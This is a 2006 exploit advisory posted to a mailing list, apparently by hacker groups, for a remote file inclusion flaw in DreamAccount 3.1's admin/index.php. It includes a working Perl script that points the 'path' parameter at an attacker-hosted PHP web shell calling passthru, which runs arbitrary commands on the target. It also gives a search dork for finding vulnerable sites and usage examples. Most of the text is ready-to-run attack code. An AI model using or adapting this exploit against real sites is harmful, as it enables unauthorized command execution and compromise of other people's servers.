DREAMACCOUNT V3.1 Remote Command Execution Exploit

Fri, 23 Jun 2006 12:24:37 -0700 

----------------------------------------------------

DREAMACCOUNT V3.1 Command Execution Exploit         

----------------------------------------------------

Discovered By CrAsh_oVeR_rIdE(Arabian Security Team)

Coded By Drago84(Exclusive Security Team)           

----------------------------------------------------

site of script:http://dreamcost.com                 

----------------------------------------------------

Vulnerable: DREAMACCOUNT V3.1                       

----------------------------------------------------

vulnerable file :                                    

------------------                                  

/admin/index.php                                    

----------------------------------------------------

vulnerable code:                                    

----------------------------------------------------

require($path . "setup.php");                       

require($path . "functions.php");                   

require($path . "payment_processing.inc.php");        

$path parameter File inclusion                      

----------------------------------------------------

#!/usr/bin/perl

use HTTP::Request;

use LWP::UserAgent;

print 
"\n=============================================================================\r\n";

print " * Dreamaccount Remote Command Execution  23/06/06 *\r\n";   

print 
"=============================================================================\r\n";

print "[*] dork:\"powered by DreamAccount 3.1\"\n";

print "[*] Coded By : Drago84 \n";

print "[*] Discovered by CrAsH_oVeR_rIdE\n";

print "[*] Use <site> <dir_Dream> <eval site> <cmd>\n";

print " Into the Eval Site it must be:\n\n";

print " Exclusive <?php  passthru($_GET[cmd]); ?> /Exclusive";


if (@ARGV < 4)

{

print "\n\n[*] usage: perl dream.pl <site> <dir dream> <eval site> <cmd>\n";

print "[*] usage: perl dream.pl www.HosT.com /dreamaccount/ 
http://www.site.org/doc.jpg id\n";

print "[*] uid=90(nobody) gid=90(nobody) egid=90(nobody) \n";

exit();

}

my $dir=$ARGV[1];

my $host=$ARGV[0];

my $eval=$ARGV[2];

my $cmd=$ARGV[3];

my $url2=$host.$dir."/admin/index.php?path=".$eval."?&cmd=".$cmd;

print "\n";

my $req=HTTP::Request->new(GET=>$url2);

my $ua=LWP::UserAgent->new();

$ua->timeout(10);

my $response=$ua->request($req);

if ($response->is_success) {

print "\n\nResult of:".$cmd."\n";

my ($pezzo_utile) = ( $response->content =~ m{Exclusive(.+)\/Exclusive}smx );

printf $1;

$response->content;

print "\n";


} 

----------------------------------------------------------------------------------------------------

Discovered By CrAsh_oVeR_rIdE

Coded By  Drago84

E-mail:[EMAIL PROTECTED]

Site:www.lezr.com

Greetz:KING-HACKER,YOUNG_HACKER

,SIMO,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3,Mr.hcR 
AND ALL LEZR.COM Member

Reply via email to